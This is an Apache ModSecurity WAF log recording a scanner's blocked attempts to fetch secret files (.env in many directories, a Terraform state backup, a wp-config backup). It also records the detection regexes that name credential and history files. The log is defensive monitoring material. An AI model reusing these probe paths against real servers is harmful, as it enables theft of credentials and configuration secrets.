[Tue May 26 14:49:46.349635 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtiAAAqVw"]
[Tue May 26 14:49:46.365216 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtgwAAqVY"]
[Tue May 26 14:49:46.365394 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtkAAAqVQ"]
[Tue May 26 14:49:46.367300 2026] [security2:error] [pid 648203:tid 648340] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtjAAAAIw"]
[Tue May 26 14:49:46.369885 2026] [security2:error] [pid 648203:tid 648396] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTthQAAAMQ"]
[Tue May 26 14:49:46.375943 2026] [security2:error] [pid 648203:tid 648281] [remote 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTthgAAqU0"]
[Tue May 26 14:49:46.375946 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtggAAqUA"]
[Tue May 26 14:49:46.376615 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTthwAAqWs"]
[Tue May 26 14:49:46.380161 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtigAAqTk"]
[Tue May 26 14:49:46.382661 2026] [security2:error] [pid 648203:tid 648428] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTteAAAAOQ"]
[Tue May 26 14:49:46.491074 2026] [security2:error] [pid 648203:tid 648266] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/srv/.env"] [unique_id "ahVlsrEQDDtxJNiDrdTtrwAAxj4"]
[Tue May 26 14:49:46.494450 2026] [security2:error] [pid 648203:tid 648212] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/stage/.env"] [unique_id "ahVlsrEQDDtxJNiDrdTtsAAAxgg"]
[Tue May 26 14:49:46.497163 2026] [security2:error] [pid 648203:tid 648284] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/staging/.env"] [unique_id "ahVlsrEQDDtxJNiDrdTtsQAAxlA"]
[Tue May 26 14:49:46.513550 2026] [security2:error] [pid 648203:tid 648307] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/stg/.env"] [unique_id "ahVlsrEQDDtxJNiDrdTttgAAxmc"]
[Tue May 26 14:49:46.532886 2026] [security2:error] [pid 648203:tid 648207] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/stripe/.env"] [unique_id "ahVlsrEQDDtxJNiDrdTtwQAAxgM"]
[Tue May 26 14:49:46.551559 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtrgAAxgU"]
[Tue May 26 14:49:46.556967 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtsgAAxmQ"]
[Tue May 26 14:49:46.559323 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTttAAAxnE"]
[Tue May 26 14:49:46.564813 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtswAAxm4"]
[Tue May 26 14:49:46.565059 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTttQAAxnk"]
[Tue May 26 14:49:46.581077 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtuAAAxl0"]
[Tue May 26 14:49:46.594673 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtvQAAxgE"]
[Tue May 26 14:49:46.595526 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtuQAAxmo"]
[Tue May 26 14:49:46.599665 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtuwAAxl4"]
[Tue May 26 14:49:46.626232 2026] [security2:error] [pid 648203:tid 648345] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtxAAAAJE"]
[Tue May 26 14:49:46.633359 2026] [security2:error] [pid 648203:tid 648382] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtwwAAALY"]
[Tue May 26 14:49:46.705122 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtxQAAxgY"]
[Tue May 26 14:49:46.707428 2026] [security2:error] [pid 648203:tid 648323] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVlsrEQDDtxJNiDrdTt1QAAxnc"]
[Tue May 26 14:49:46.718084 2026] [security2:error] [pid 648203:tid 648414] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtygAAANY"]
[Tue May 26 14:49:46.721460 2026] [security2:error] [pid 648203:tid 648385] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtywAAALk"]
[Tue May 26 14:49:46.729522 2026] [security2:error] [pid 648203:tid 648294] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/test.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt3AAAxlo"]
[Tue May 26 14:49:46.743254 2026] [security2:error] [pid 648203:tid 648322] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/test/.env"] [unique_id "ahVlsrEQDDtxJNiDrdTt3gAAxnY"]
[Tue May 26 14:49:46.794188 2026] [security2:error] [pid 648203:tid 648312] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/user/.env"] [unique_id "ahVlsrEQDDtxJNiDrdTt6AAAxmw"]
[Tue May 26 14:49:46.862382 2026] [security2:error] [pid 648203:tid 648320] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/v1/.env"] [unique_id "ahVlsrEQDDtxJNiDrdTt8gAAxnQ"]
[Tue May 26 14:49:46.881138 2026] [security2:error] [pid 648203:tid 648291] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/v2/.env"] [unique_id "ahVlsrEQDDtxJNiDrdTt9gAAxlc"]
[Tue May 26 14:49:46.881177 2026] [security2:error] [pid 648203:tid 648228] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/v3/.env"] [unique_id "ahVlsrEQDDtxJNiDrdTt9wAAxhg"]
[Tue May 26 14:49:47.000569 2026] [security2:error] [pid 648203:tid 648433] [client 45.148.10.5:16498] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/wp-config.php.old"] [unique_id "ahVls7EQDDtxJNiDrdTuAgAAAOk"]
[Tue May 26 14:49:47.289815 2026] [security2:error] [pid 648203:tid 648348] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtzgAAAJQ"]
[Tue May 26 14:49:47.308449 2026] [security2:error] [pid 648203:tid 648338] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt0QAAAIo"]
[Tue May 26 14:49:47.341520 2026] [security2:error] [pid 648203:tid 648349] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt5AAAAJU"]
[Tue May 26 14:49:47.341892 2026] [security2:error] [pid 648203:tid 648451] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt2gAAAPs"]
[Tue May 26 14:49:47.343298 2026] [security2:error] [pid 648203:tid 648377] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuCQAAALE"]
[Tue May 26 14:49:47.344125 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt1wAAxmU"]
[Tue May 26 14:49:47.345593 2026] [security2:error] [pid 648203:tid 648418] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt2QAAANo"]
[Tue May 26 14:49:47.348677 2026] [security2:error] [pid 648203:tid 648381] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt8wAAALU"]
[Tue May 26 14:49:47.349498 2026] [security2:error] [pid 648203:tid 648404] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt-wAAAMw"]
[Tue May 26 14:49:47.353457 2026] [security2:error] [pid 648203:tid 648432] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt-AAAAOg"]
[Tue May 26 14:49:47.358110 2026] [security2:error] [pid 648203:tid 648426] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt4wAAAOI"]
[Tue May 26 14:49:47.358174 2026] [security2:error] [pid 648203:tid 648460] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt3QAAAQQ"]
[Tue May 26 14:49:47.362199 2026] [security2:error] [pid 648203:tid 648437] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt_gAAAO0"]
[Tue May 26 14:49:47.363745 2026] [security2:error] [pid 648203:tid 648388] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuCgAAALw"]
[Tue May 26 14:49:47.366340 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuAwAAxnI"]
[Tue May 26 14:49:47.371896 2026] [security2:error] [pid 648203:tid 648408] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt5wAAANA"]
[Tue May 26 14:49:47.514591 2026] [security2:error] [pid 648203:tid 648217] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/var/www/.env"] [unique_id "ahVls7EQDDtxJNiDrdTuJgAArg0"]
[Tue May 26 14:49:47.515068 2026] [security2:error] [pid 648203:tid 648442] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuFgAAAPI"]
[Tue May 26 14:49:47.523984 2026] [security2:error] [pid 648203:tid 648240] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/var/www/html/.env"] [unique_id "ahVls7EQDDtxJNiDrdTuLAAAriQ"]
[Tue May 26 14:49:47.538938 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuFwAArnw"]
[Tue May 26 14:49:47.569569 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuGgAArng"]
[Tue May 26 14:49:47.577934 2026] [security2:error] [pid 648203:tid 648417] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuJwAAANk"]
